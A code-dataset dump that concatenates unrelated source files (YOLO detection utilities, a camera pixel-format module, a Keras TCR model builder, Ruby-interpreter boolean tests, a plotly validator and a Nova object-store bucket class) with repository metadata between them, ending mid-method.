x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def print_mutation(hyp, results, yaml_file='hyp_evolved.yaml', bucket=''):
# Print mutation results to evolve.txt (for use with train.py --evolve)
a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys
b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values
c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
if bucket:
url = 'gs://%s/evolve.txt' % bucket
if gsutil_getsize(url) > (os.path.getsize('evolve.txt') if os.path.exists('evolve.txt') else 0):
os.system('gsutil cp %s .' % url) # download evolve.txt if larger than local
with open('evolve.txt', 'a') as f: # append result
f.write(c + b + '\n')
x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows
x = x[np.argsort(-fitness(x))] # sort
np.savetxt('evolve.txt', x, '%10.3g') # save sort by fitness
# Save yaml
for i, k in enumerate(hyp.keys()):
hyp[k] = float(x[0, i + 7])
with open(yaml_file, 'w') as f:
results = tuple(x[0, :7])
c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3)
f.write('# Hyperparameter Evolution Results\n# Generations: %g\n# Metrics: ' % len(x) + c + '\n\n')
yaml.dump(hyp, f, sort_keys=False)
if bucket:
os.system('gsutil cp evolve.txt %s gs://%s' % (yaml_file, bucket)) # upload
def apply_classifier(x, model, img, im0):
# applies a second stage classifier to yolo outputs
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for j, a in enumerate(d): # per item
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
# cv2.imwrite('test%i.jpg' % j, cutout)
im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
| 41.410745
| 120
| 0.572278
|
13a51fdcaf85725d26775cae30e81b2bd7027c2e
| 11,311
|
py
|
Python
|
src/harvesters/util/pfnc.py
|
jcormier/harvesters
|
81ec7aad4799e4432f7bd474b9215d248b7e1be5
|
[
"Apache-2.0"
] | null | null | null |
src/harvesters/util/pfnc.py
|
jcormier/harvesters
|
81ec7aad4799e4432f7bd474b9215d248b7e1be5
|
[
"Apache-2.0"
] | null | null | null |
src/harvesters/util/pfnc.py
|
jcormier/harvesters
|
81ec7aad4799e4432f7bd474b9215d248b7e1be5
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# ----------------------------------------------------------------------------
#
# Copyright 2018 EMVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ----------------------------------------------------------------------------
# Standard library imports
# Related third party imports
# Local application/library specific imports
from harvesters.util._pfnc import symbolics as _symbolics
#
symbolics = _symbolics
dict_by_ints = symbolics
dict_by_names = {n: i for i, n in symbolics.items()}
# 32-bit value layout
# |31 24|23 16|15 08|07 00|
# | C| Comp. Layout| Effective Size | Pixel ID |
# Custom flag
pfnc_custom = 0x80000000
# Component layout
pfnc_single_component = 0x01000000
pfnc_multiple_component = 0x02000000
pfnc_component_mask = 0x02000000
# Effective size
pfnc_pixel_size_mask = 0x00ff0000
pfnc_pixel_size_shift = 16
def get_effective_pixel_size(pixel_format_value):
"""
Returns the effective pixel size (number of bits a pixel occupies in memory).
This includes padding in many cases and the actually used bits are less.
"""
return (pixel_format_value & pfnc_pixel_size_mask) >> \
pfnc_pixel_size_shift
def is_custom(pixel_format_value):
return (pixel_format_value & pfnc_custom) == pfnc_custom
def is_single_component(pixel_format_value):
return (pixel_format_value & pfnc_component_mask) == pfnc_single_component
def is_multiple_component(pixel_format_value):
return (pixel_format_value & pfnc_component_mask) == pfnc_multiple_component
def get_bits_per_pixel(data_format):
"""
Returns the number of (used) bits per pixel.
So without padding.
Returns None if format is not known.
"""
if data_format in component_8bit_formats:
return 8
elif data_format in component_10bit_formats:
return 10
elif data_format in component_12bit_formats:
return 12
elif data_format in component_14bit_formats:
return 14
elif data_format in component_16bit_formats:
return 16
# format not known
return None
mono_location_formats = [
#
'Mono8',
'Mono8s',
'Mono10',
'Mono12',
'Mono14',
'Mono16',
#
'R8',
'R10',
'R12',
'R16',
'G8',
'G10',
'G12',
'G16',
'B8',
'B10',
'B12',
'B16',
#
'Coord3D_A8',
'Coord3D_B8',
'Coord3D_C8',
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
'Coord3D_A32f',
'Coord3D_B32f',
'Coord3D_C32f',
#
'Confidence1',
'Confidence8',
'Confidence16',
'Confidence32f',
]
mono_packed_location_formats = [
'Mono1p',
'Mono2p',
'Mono4p',
'Mono10Packed',
'Mono10p',
'Mono12Packed',
'Mono12p',
'Coord3D_A10p',
'Coord3D_B10p',
'Coord3D_C10p',
'Coord3D_A12p',
'Coord3D_B12p',
'Coord3D_C12p',
]
lmn_444_location_formats = [
#
'RGB8',
'RGB10',
'RGB12',
'RGB14',
'RGB16',
#
'BGR8',
'BGR10',
'BGR12',
'BGR14',
'BGR16',
#
'Coord3D_ABC8',
'Coord3D_ABC8_Planar',
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
'Coord3D_ABC32f',
'Coord3D_ABC32f_Planar',
]
lmn_444_packed_location_formats = [
#
'RGB8Packed',
#
'Coord3D_ABC10p',
'Coord3D_ABC10p_Planar',
'Coord3D_ABC12p',
'Coord3D_ABC12p_Planar',
]
lmn_422_location_formats = [
'YUV422_8_UYVY',
'YUV422_8',
'YCbCr422_8',
'YCbCr601_422_8',
'YCbCr709_422_8',
'YCbCr422_8_CbYCrY',
'YCbCr601_422_8_CbYCrY',
'YCbCr709_422_8_CbYCrY',
'YCbCr422_10',
'YCbCr422_12',
'YCbCr601_422_10',
'YCbCr601_422_12',
'YCbCr709_422_10',
'YCbCr709_422_12',
'YCbCr422_10_CbYCrY',
'YCbCr422_12_CbYCrY',
'YCbCr601_422_10_CbYCrY',
'YCbCr601_422_12_CbYCrY',
'YCbCr709_422_10_CbYCrY',
'YCbCr709_422_12_CbYCrY',
'YCbCr2020_422_8',
'YCbCr2020_422_8_CbYCrY',
'YCbCr2020_422_10',
'YCbCr2020_422_10_CbYCrY',
'YCbCr2020_422_12',
'YCbCr2020_422_12_CbYCrY',
]
lmn_422_packed_location_formats = [
'YCbCr422_10p',
'YCbCr422_12p',
'YCbCr601_422_10p',
'YCbCr601_422_12p',
'YCbCr709_422_10p',
'YCbCr709_422_12p',
'YCbCr422_10p_CbYCrY',
'YCbCr422_12p_CbYCrY',
'YCbCr601_422_10p_CbYCrY',
'YCbCr601_422_12p_CbYCrY',
'YCbCr709_422_10p_CbYCrY',
'YCbCr709_422_12p_CbYCrY',
'YCbCr2020_422_10p',
'YCbCr2020_422_10p_CbYCrY',
'YCbCr2020_422_12p',
'YCbCr2020_422_12p_CbYCrY',
]
lmn_411_location_formats = [
'YUV411_8_UYYVYY',
'YCbCr411_8_CbYYCrYY',
'YCbCr601_411_8_CbYYCrYY',
'YCbCr709_411_8_CbYYCrYY',
'YCbCr411_8',
'YCbCr2020_411_8_CbYYCrYY',
]
lmno_4444_location_formats = [
'RGBa8',
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
'BGRa8',
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
]
lmno_4444_packed_location_formats = [
'RGBa10p',
'RGBa12p',
'BGRa10p',
'BGRa12p',
]
lm_44_location_formats = [
'Coord3D_AC8',
'Coord3D_AC8_Planar',
'Coord3D_AC16',
'Coord3D_AC16_Planar',
'Coord3D_AC32f',
'Coord3D_AC32f_Planar',
]
lm_44_packed_location_formats = [
'Coord3D_AC10p',
'Coord3D_AC10p_Planar',
'Coord3D_AC12p',
'Coord3D_AC12p_Planar',
]
bayer_location_formats = [
'BayerGR8',
'BayerRG8',
'BayerGB8',
'BayerBG8',
'BayerGR10',
'BayerRG10',
'BayerGB10',
'BayerBG10',
'BayerGR12',
'BayerRG12',
'BayerGB12',
'BayerBG12',
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
]
bayer_packed_location_formats = [
'BayerGR10Packed',
'BayerRG10Packed',
'BayerGB10Packed',
'BayerBG10Packed',
'BayerGR12Packed',
'BayerRG12Packed',
'BayerGB12Packed',
'BayerBG12Packed',
'BayerBG10p',
'BayerBG12p',
'BayerGB10p',
'BayerGB12p',
'BayerGR10p',
'BayerGR12p',
'BayerRG10p',
'BayerRG12p',
]
uint8_formats = [
#
'Mono8',
#
'RGB8',
'RGB8Packed',
'RGBa8',
#
'BGR8',
'BGRa8',
#
'BayerGR8',
'BayerGB8',
'BayerRG8',
'BayerBG8',
#
'Coord3D_A8',
'Coord3D_B8',
'Coord3D_C8',
'Coord3D_ABC8',
'Coord3D_ABC8_Planar',
'Coord3D_AC8',
'Coord3D_AC8_Planar',
#
'Confidence1',
'Confidence8',
]
uint16_formats = [
#
'Mono10',
'Mono12',
'Mono14',
'Mono16',
#
'RGB10',
'RGB12',
'RGB14',
'RGB16',
#
'BGR10',
'BGR12',
'BGR14',
'BGR16',
#
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
#
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
#
'BayerGR10',
'BayerGB10',
'BayerRG10',
'BayerBG10',
#
'BayerGR12',
'BayerGB12',
'BayerRG12',
'BayerBG12',
#
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
#
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
#
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
#
'Coord3D_AC16',
'Coord3D_AC16_Planar',
#
'Coord3D_A10p',
'Coord3D_B10p',
'Coord3D_C10p',
#
'Coord3D_A12p',
'Coord3D_B12p',
'Coord3D_C12p',
#
'Coord3D_ABC10p',
'Coord3D_ABC10p_Planar',
#
'Coord3D_ABC12p',
'Coord3D_ABC12p_Planar',
#
'Coord3D_AC10p',
'Coord3D_AC10p_Planar',
#
'Coord3D_AC12p',
'Coord3D_AC12p_Planar',
#
'Confidence16',
]
uint32_formats = [
'Mono32',
]
float32_formats = [
#
'Coord3D_A32f',
'Coord3D_B32f',
'Coord3D_C32f',
#
'Coord3D_ABC32f',
'Coord3D_ABC32f_Planar',
#
'Coord3D_AC32f',
'Coord3D_AC32f_Planar',
#
'Confidence32f',
]
component_8bit_formats = [
#
'Mono8',
#
'RGB8',
'RGBa8',
#
'BGR8',
'BGRa8',
#
'BayerGR8',
'BayerGB8',
'BayerRG8',
'BayerBG8',
#
'Confidence8',
]
component_10bit_formats = [
#
'Mono10',
#
'RGB10',
'RGBa10',
#
'BGR10',
'BGRa10',
#
'BayerGR10',
'BayerGB10',
'BayerRG10',
'BayerBG10',
]
component_12bit_formats = [
#
'Mono12',
#
'RGB12',
'RGBa12',
#
'BGR12',
'BGRa12',
#
'BayerGR12',
'BayerGB12',
'BayerRG12',
'BayerBG12',
]
component_14bit_formats = [
#
'Mono14',
#
'RGB14',
'RGBa14',
#
'BGR14',
'BGRa14',
]
component_16bit_formats = [
#
'Mono16',
#
'RGB16',
'RGBa16',
#
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
#
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
#
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
#
'Coord3D_AC16',
'Coord3D_AC16_Planar',
#
'Confidence16',
]
component_32bit_formats = [
'Confidence32f',
]
component_2d_formats = [
#
'Mono8',
'Mono10',
'Mono12',
'Mono14',
'Mono16',
#
'RGB8',
'RGB10',
'RGB12',
'RGB14',
'RGB16',
#
'BGR8',
'BGR10',
'BGR12',
'BGR14',
'BGR16',
#
'RGBa8',
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
#
'BGRa8',
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
#
'BayerGR8',
'BayerGB8',
'BayerRG8',
'BayerBG8',
#
'BayerGR10',
'BayerGB10',
'BayerRG10',
'BayerBG10',
#
'BayerGR12',
'BayerGB12',
'BayerRG12',
'BayerBG12',
#
'BayerGR16',
'BayerRG16',
'BayerGB16',
'BayerBG16',
#
'Coord3D_A8',
'Coord3D_B8',
'Coord3D_C8',
'Coord3D_ABC8',
'Coord3D_ABC8_Planar',
'Coord3D_AC8',
'Coord3D_AC8_Planar',
'Coord3D_A16',
'Coord3D_B16',
'Coord3D_C16',
'Coord3D_ABC16',
'Coord3D_ABC16_Planar',
'Coord3D_AC16',
'Coord3D_AC16_Planar',
'Coord3D_A32f',
'Coord3D_B32f',
'Coord3D_C32f',
'Coord3D_ABC32f',
'Coord3D_ABC32f_Planar',
'Coord3D_AC32f',
'Coord3D_AC32f_Planar',
'Coord3D_A10p',
'Coord3D_B10p',
'Coord3D_C10p',
'Coord3D_A12p',
'Coord3D_B12p',
'Coord3D_C12p',
'Coord3D_ABC10p',
'Coord3D_ABC10p_Planar',
'Coord3D_ABC12p',
'Coord3D_ABC12p_Planar',
'Coord3D_AC10p',
'Coord3D_AC10p_Planar',
'Coord3D_AC12p',
'Coord3D_AC12p_Planar',
#
'Confidence1',
'Confidence1p',
'Confidence8',
'Confidence16',
'Confidence32f',
]
rgb_formats = [
#
'RGB8',
'RGB10',
'RGB12',
'RGB14',
'RGB16',
]
rgba_formats = [
#
'RGBa8',
'RGBa10',
'RGBa12',
'RGBa14',
'RGBa16',
]
bgr_formats = [
#
'BGR8',
'BGR10',
'BGR12',
'BGR14',
'BGR16',
]
bgra_formats = [
#
'BGRa8',
'BGRa10',
'BGRa12',
'BGRa14',
'BGRa16',
]
| 17.401538
| 81
| 0.583503
|
ee82ea1ec759ee004eaacb23d3cba41cf50c5b43
| 4,722
|
py
|
Python
|
hyper_parameter_tuning/_v4_build_model_general_u.py
|
sunway1999/deep_omics
|
5ceb61aa1555ceed49c85a1b49c99ca9ca48e6b5
|
[
"MIT"
] | 16
|
2022-01-11T19:58:18.000Z
|
2022-02-27T14:48:15.000Z
|
hyper_parameter_tuning/_v4_build_model_general_u.py
|
sunway1999/deep_omics
|
5ceb61aa1555ceed49c85a1b49c99ca9ca48e6b5
|
[
"MIT"
] | null | null | null |
hyper_parameter_tuning/_v4_build_model_general_u.py
|
sunway1999/deep_omics
|
5ceb61aa1555ceed49c85a1b49c99ca9ca48e6b5
|
[
"MIT"
] | 4
|
2022-01-15T03:25:29.000Z
|
2022-03-27T00:21:02.000Z
|
# change CNN structure to the same as that from the
# De novo prediction of cancer-associated T cell receptors
# for noninvasive cancer detection
# paper
# https://github.com/s175573/DeepCAT
# all parameters for CNN part are directly carried over from
# the inplementation of this repo
from tensorflow.keras.activations import relu
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Dense, Embedding, Flatten, Conv1D, MaxPooling1D
from tensorflow.keras.layers import Reshape, Dropout, concatenate
# structure currently limited to maximum two dense layers
# and one dropout layer
def get_model(HLA_shape, V_shape, CDR3_shape, len_shape, \
cdr1_shape, cdr2_shape, cdr25_shape,
V_cdrs = 2, \
CNN_flag = True, \
n_dense = 1, n_units = [16], \
dropout_flag = False, p_dropout = 0.2):
# check the inputs:
if n_dense >2:
print("Error from func get_model: number of dense layers not coded for yet.")
return
if n_dense > 1 and n_dense > len(n_units):
print('Error from func get_model: n_units input is not long enough.')
return
# Define input layers
HLA_input = Input(HLA_shape)
HLA_reshape = Reshape((HLA_shape[0] * HLA_shape[1],), \
input_shape = HLA_shape)(HLA_input)
V_input = Input(V_shape) #(28,)
CDR3_input = Input(CDR3_shape)
len_input = Input(len_shape)
cdr1_input = Input(cdr1_shape)
cdr2_input = Input(cdr2_shape)
cdr25_input = Input(cdr25_shape)
cdr1_reshape = Reshape((cdr1_shape[0] * cdr1_shape[1],), \
input_shape = cdr1_shape)(cdr1_input)
cdr2_reshape = Reshape((cdr2_shape[0] * cdr2_shape[1],), \
input_shape = cdr2_shape)(cdr2_input)
cdr25_reshape = Reshape((cdr25_shape[0] * cdr25_shape[1],), \
input_shape = cdr25_shape)(cdr25_input)
# whether to use CNN or not
if CNN_flag:
# construct CDR3_branches
CDR3_branch = Conv1D(filters=8, kernel_size=2, activation=relu, \
input_shape = CDR3_shape, name='Conv_CDR3_1')(CDR3_input)
CDR3_branch = MaxPooling1D(pool_size=2, strides=1, padding='valid', \
name='MaxPooling_CDR3_1')(CDR3_branch)
CDR3_flatten = Flatten(name='Flatten_CDR3')(CDR3_branch)
CDR3_reshape = Reshape((CDR3_shape[0] * CDR3_shape[1],), \
input_shape = CDR3_shape)(CDR3_input)
CDR3_inter_layer = concatenate([CDR3_flatten, CDR3_reshape], axis=-1)
else:
CDR3_inter_layer = Reshape((CDR3_shape[0] * CDR3_shape[1],), \
input_shape = CDR3_shape)(CDR3_input)
# concatenate parts together
HLA_part = Dense(64, activation = relu)(HLA_reshape)
if V_cdrs == 2:
TCR_combined = concatenate([V_input, len_input, CDR3_inter_layer, \
cdr1_reshape, cdr2_reshape, cdr25_reshape])
TCR_part = Dense(64, activation = relu)(TCR_combined)
inter_layer = concatenate([HLA_part, TCR_part])
elif V_cdrs == 0:
TCR_combined = concatenate([V_input, len_input, CDR3_inter_layer])
TCR_part = Dense(64, activation = relu)(TCR_combined)
inter_layer = concatenate([HLA_part, TCR_part])
else:
TCR_combined = concatenate([len_input, CDR3_inter_layer, \
cdr1_reshape, cdr2_reshape, cdr25_reshape])
TCR_part = Dense(64, activation = relu)(TCR_combined)
inter_layer = concatenate([HLA_part, TCR_part])
# move on to see how many dense layers we want
# and whether we want a dropout layer
if n_dense == 1:
if not dropout_flag:
last_layer = Dense(n_units[0], activation = relu)(inter_layer)
else:
dense_layer = Dense(n_units[0], activation = relu)(inter_layer)
last_layer = Dropout(p_dropout)(dense_layer)
else:
if not dropout_flag:
first_dense = Dense(n_units[0], activation = relu)(inter_layer)
last_layer = Dense(n_units[1], activation = relu)(first_dense)
else:
first_dense = Dense(n_units[0], activation = relu)(inter_layer)
dropout_layer = Dropout(p_dropout)(first_dense)
last_layer = Dense(n_units[1], activation = relu)(dropout_layer)
# final output layer
output = Dense(1, activation = 'sigmoid', name = 'output')(last_layer)
# build the model
model = Model(inputs=[HLA_input, V_input, CDR3_input, len_input, \
cdr1_input, cdr2_input, cdr25_input], outputs = output)
return model
| 46.752475
| 90
| 0.638289
|
d856a4c7f36c1584eb876c64217a2d7fa7188a3d
| 2,999
|
py
|
Python
|
tests/objects/test_boolobject.py
|
mswart/topaz
|
4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae
|
[
"BSD-3-Clause"
] | 241
|
2015-01-02T18:49:09.000Z
|
2022-03-15T15:08:45.000Z
|
tests/objects/test_boolobject.py
|
mswart/topaz
|
4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae
|
[
"BSD-3-Clause"
] | 16
|
2015-05-04T21:31:08.000Z
|
2020-06-04T22:49:36.000Z
|
tests/objects/test_boolobject.py
|
mswart/topaz
|
4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae
|
[
"BSD-3-Clause"
] | 24
|
2015-02-15T05:35:11.000Z
|
2022-03-22T13:29:04.000Z
|
from ..base import BaseTopazTest
class TestTrueObject(BaseTopazTest):
def test_name(self, space):
space.execute("TrueClass")
def test_to_s(self, space):
w_res = space.execute("return true.to_s")
assert space.str_w(w_res) == "true"
def test_inspect(self, space):
w_res = space.execute("return true.inspect")
assert space.str_w(w_res) == "true"
def test_eql(self, space):
w_res = space.execute("return true == false")
assert self.unwrap(space, w_res) is False
w_res = space.execute("return true == true")
assert self.unwrap(space, w_res) is True
def test_and(self, space):
w_res = space.execute("return true & 3")
assert w_res is space.w_true
w_res = space.execute("return true & false")
assert w_res is space.w_false
def test_or(self, space):
w_res = space.execute("return true | 3")
assert w_res is space.w_true
w_res = space.execute("return true | nil")
assert w_res is space.w_true
def test_xor(self, space):
assert space.execute("return true ^ nil") is space.w_true
assert space.execute("return true ^ false") is space.w_true
assert space.execute("return true ^ true") is space.w_false
assert space.execute("return true ^ 1") is space.w_false
def test_singleton_class(self, space):
w_res = space.execute("return true.singleton_class == TrueClass")
assert w_res is space.w_true
class TestFalseObject(BaseTopazTest):
def test_name(self, space):
space.execute("FalseClass")
def test_to_s(self, space):
w_res = space.execute("return false.to_s")
assert space.str_w(w_res) == "false"
def test_inspect(self, space):
w_res = space.execute("return false.inspect")
assert space.str_w(w_res) == "false"
def test_eql(self, space):
w_res = space.execute("return false == false")
assert self.unwrap(space, w_res) is True
w_res = space.execute("return false == true")
assert self.unwrap(space, w_res) is False
def test_and(self, space):
w_res = space.execute("return false & 3")
assert w_res is space.w_false
w_res = space.execute("return false & false")
assert w_res is space.w_false
def test_or(self, space):
w_res = space.execute("return false | 3")
assert w_res is space.w_true
w_res = space.execute("return false | nil")
assert w_res is space.w_false
def test_xor(self, space):
assert space.execute("return false ^ nil") is space.w_false
assert space.execute("return false ^ false") is space.w_false
assert space.execute("return false ^ true") is space.w_true
assert space.execute("return false ^ 1") is space.w_true
def test_singleton_class(self, space):
w_res = space.execute("return false.singleton_class == FalseClass")
assert w_res is space.w_true
| 34.872093
| 75
| 0.643881
|
8ee576696ac4780f959d152c8e7d1a4f298c87cf
| 464
|
py
|
Python
|
plotly/validators/layout/scene/yaxis/_zerolinecolor.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/layout/scene/yaxis/_zerolinecolor.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | null | null | null |
plotly/validators/layout/scene/yaxis/_zerolinecolor.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class ZerolinecolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name='zerolinecolor',
parent_name='layout.scene.yaxis',
**kwargs
):
super(ZerolinecolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='plot',
role='style',
**kwargs
)
| 24.421053
| 74
| 0.612069
|
61feb4a4c3a3e8695e2e6faf17cc54d324a1586c
| 5,424
|
py
|
Python
|
nova/objectstore/bucket.py
|
joshuamckenty/yolo-octo-wookie
|
8e078e91d367f3deaf1785c46ee7734dd7907f24
|
[
"Apache-2.0"
] | 1
|
2021-06-09T17:58:53.000Z
|
2021-06-09T17:58:53.000Z
|
nova/objectstore/bucket.py
|
joshuamckenty/yolo-octo-wookie
|
8e078e91d367f3deaf1785c46ee7734dd7907f24
|
[
"Apache-2.0"
] | null | null | null |
nova/objectstore/bucket.py
|
joshuamckenty/yolo-octo-wookie
|
8e078e91d367f3deaf1785c46ee7734dd7907f24
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Simple object store using Blobs and JSON files on disk.
"""
import datetime
import glob
import json
import os
import bisect
from nova import exception
from nova import flags
from nova import utils
from nova.objectstore import stored
FLAGS = flags.FLAGS
flags.DEFINE_string('buckets_path', utils.abspath('../buckets'),
'path to s3 buckets')
class Bucket(object):
def __init__(self, name):
self.name = name
self.path = os.path.abspath(os.path.join(FLAGS.buckets_path, name))
if not self.path.startswith(os.path.abspath(FLAGS.buckets_path)) or \
not os.path.isdir(self.path):
raise exception.NotFound()
self.ctime = os.path.getctime(self.path)
def __repr__(self):
return "<Bucket: %s>" % self.name
@staticmethod
def all():
""" list of all buckets """
buckets = []
for fn in glob.glob("%s/*.json" % FLAGS.buckets_path):
try:
json.load(open(fn))
name = os.path.split(fn)[-1][:-5]
buckets.append(Bucket(name))
except:
pass
return buckets
@staticmethod
def create(bucket_name, context):
"""Create a new bucket owned by a project.
@bucket_name: a string representing the name of the bucket to create
@context: a nova.auth.api.ApiContext object representing who owns the bucket.
Raises:
NotAuthorized: if the bucket is already exists or has invalid name
"""
path = os.path.abspath(os.path.join(
FLAGS.buckets_path, bucket_name))
if not path.startswith(os.path.abspath(FLAGS.buckets_path)) or \
os.path.exists(path):
raise exception.NotAuthorized()
os.makedirs(path)
with open(path+'.json', 'w') as f:
json.dump({'ownerId': context.project.id}, f)
@property
def metadata(self):
""" dictionary of metadata around bucket,
keys are 'Name' and 'CreationDate'
"""
return {
"Name": self.name,
"CreationDate": datetime.datetime.utcfromtimestamp(self.ctime),
}
@property
def owner_id(self):
try:
with open(self.path+'.json') as f:
return json.load(f)['ownerId']
except:
return None
def is_authorized(self, context):
try:
return context.user.is_admin() or self.owner_id == context.project.id
except Exception, e:
pass
def list_keys(self, prefix='', marker=None, max_keys=1000, terse=False):
object_names = []
for root, dirs, files in os.walk(self.path):
for file_name in files:
object_names.append(os.path.join(root, file_name)[len(self.path)+1:])
object_names.sort()
contents = []
start_pos = 0
if marker:
start_pos = bisect.bisect_right(object_names, marker, start_pos)
if prefix:
start_pos = bisect.bisect_left(object_names, prefix, start_pos)
truncated = False
for object_name in object_names[start_pos:]:
if not object_name.startswith(prefix):
break
if len(contents) >= max_keys:
truncated = True
break
object_path = self._object_path(object_name)
c = {"Key": object_name}
if not terse:
info = os.stat(object_path)
c.update({
"LastModified": datetime.datetime.utcfromtimestamp(
info.st_mtime),
"Size": info.st_size,
})
contents.append(c)
marker = object_name
return {
"Name": self.name,
"Prefix": prefix,
"Marker": marker,
"MaxKeys": max_keys,
"IsTruncated": truncated,
"Contents": contents,
}
def _object_path(self, object_name):
fn = os.path.join(self.path, object_name)
if not fn.startswith(self.path):
raise exception.NotAuthorized()
return fn
def delete(self):
if len(os.listdir(self.path)) > 0:
raise exception.NotAuthorized()
os.rmdir(self.path)
os.remove(self.path+'.json')
def __getitem__(self, key):
return stored.Object(self, key)
def __setitem__(self, key, value):
